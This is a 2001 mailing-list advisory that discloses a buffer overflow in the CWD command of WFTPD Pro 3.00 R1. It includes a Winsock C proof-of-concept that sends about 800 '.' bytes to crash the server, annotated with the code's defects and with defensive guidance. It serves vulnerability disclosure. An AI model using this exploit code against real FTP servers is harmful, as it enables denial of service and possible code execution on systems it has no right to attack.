WFTPD Pro 3.00 R1 Buffer Overflow
From: se00020 () LION CC
Date: Sat, 3 Mar 2001 18:51:52 -0000
When sending a command (cwd) followed by a long argument (~500 char '.') the server crashes with: Anwendungspopup: WFTPD Service Control: WFTPD.EXE - Fehler in Anwendung: Die Anweisung in "0x2e2e2e2e" verweist auf Speicher in "0x2e2e2e2e". Der Vorgang "read" konnte nicht auf dem Speicher durchgeführt werden. which means in English: Exception fault at: 0x2e2e2e2e reading from 0x2e2e2e2e is not possible... Executing arbitrary code is possible The author has been contacted ---------------------- se00020 () fhs-hagenberg ac at or se00020 () lion cc Tested on win2k using trail version of WFTPD 3.00 R1 Simple exploit:
//WFTPD Pro 3.00 R1 Buffer Overflow exploit
//written by se00020 () fhs-hagenberg ac at
#include <stdio.h>
#include <winsock.h>
#include <windows.h>
#include <malloc.h>

/*
 * Proof of concept as posted: connects to the FTP server at the hard-coded
 * address, sends USER/PASS, then sends a CWD command whose argument is a run
 * of '.' bytes, reproducing the crash described above. 0x2e is the ASCII code
 * of '.', which is why the reported fault address is 0x2e2e2e2e: the server
 * ended up dereferencing bytes taken straight from the oversized argument.
 *
 * Kept verbatim for the record. The comments below note the PoC's own defects
 * (it is not clean C and has undefined behaviour of its own) and what a
 * defender should take from it: a CWD argument of several hundred bytes is
 * the thing to alert on, and the server-side fix is to bound the argument
 * length before it is copied anywhere.
 *
 * Written against MSVC/Winsock: `void main` and `(sockaddr*)` without
 * `struct` suggest it was compiled as C++; it does not build as C11 and
 * does not build outside Windows.
 */
void main(){
    SOCKET sock_victim;
    WORD version=MAKEWORD(1,1);
    WSADATA wsadata;
    SOCKADDR_IN victim;
    int sockid;                         /* receives connect()'s return code, not a socket handle */
    char buffer[1024];
    char exploitbuffer[800]={"CWD "};   /* "CWD " + 796 '.' below fills all 800 bytes: no NUL terminator remains */
    char recvbuffer[1024];
    WSAStartup(version, &wsadata);
    sock_victim=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    victim.sin_family=AF_INET;
    victim.sin_addr.s_addr=inet_addr ("10.17.3.44");   /* the poster's own lab host (RFC 1918 private address) */
    victim.sin_port=htons(21);
    sockid=connect(sock_victim, (sockaddr*) &victim, sizeof(victim));   /* result never checked */
    recv(sock_victim, recvbuffer, sizeof (recvbuffer),0);   /* banner; every recv()/send() result is ignored */
    memset(recvbuffer, '/0',sizeof(recvbuffer));   /* '/0' is a multi-character constant, not '\0' (typo in the original) */
    send(sock_victim, "USER test\r\n",strlen ("USER test\r\n"),0);
    recv(sock_victim, recvbuffer, sizeof (recvbuffer),0);
    memset(recvbuffer, '/0',sizeof(recvbuffer));
    send(sock_victim, "PASS\r\n",strlen ("PASS\r\n"),0);   /* empty password; whether login must succeed before CWD is not stated */
    recv(sock_victim, recvbuffer, sizeof (recvbuffer),0);
    memset(recvbuffer, '/0',sizeof(recvbuffer));
    memset(exploitbuffer+4,'.',sizeof (exploitbuffer)-4);   /* 796 bytes of '.', consistent with the 0x2e2e2e2e fault address */
    sprintf(buffer,"%s\r\n",exploitbuffer);   /* exploitbuffer is unterminated, so "%s" reads past its end (UB in the PoC itself) */
    send(sock_victim, buffer , sizeof(buffer),0);   /* sends all 1024 bytes of buffer, including whatever follows the written text */
    recv(sock_victim, recvbuffer, sizeof (recvbuffer),0);
    closesocket(sockid);   /* closes the connect() return value, not a socket */
    closesocket(sock_victim);
}